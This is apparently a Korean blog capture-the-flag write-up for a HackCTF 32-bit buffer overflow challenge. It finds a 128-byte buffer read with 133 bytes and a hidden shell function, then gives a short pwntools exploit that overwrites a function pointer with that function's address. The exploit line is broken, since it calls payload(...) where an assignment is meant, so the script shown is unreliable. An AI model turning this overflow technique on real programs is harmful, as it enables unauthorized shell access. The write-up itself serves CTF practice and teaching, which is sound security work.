반응형
이번에는 문제를 다운받고 file명령으로 파일을 확인하자
32비트 파일이다.
IDA로 까보자
빠르게 거리부터 구하자
자 이제부터 분석을 해보도록 하자
s는 128만큼의 크기가 있고 fgets함수에서 133바이트만큼 입력받기 때문에
역시나 bof하기에는 충분해 보인다.
s는 sup함수를 가르키고 있는걸로 보인다.
IDA에서 함수목록을 보던 중 shell함수를 찾게 되었다.
pwntools로 간단하게 풀자
from pwn import *
p = remote("ctf.j0n9hyun.xyz", 3001)
payload("a"*128+"\x9B\x84\x04\x08")
p.sendline(payload)
p.interactive()
반응형
'War Game' 카테고리의 다른 글
HackCTF x64 Buffer Overflow Write Up (0) | 2020.03.08 |
---|---|
HackCTF 내 버퍼가 흘러넘친다!!! Write Up (0) | 2020.03.08 |
HackCTF Basic_BOF #1 Write Up (0) | 2020.03.07 |
Do it! 점프 투 파이썬 후기 (0) | 2019.11.24 |
코드엔진 Basic RCE L16 Write Up (0) | 2019.09.29 |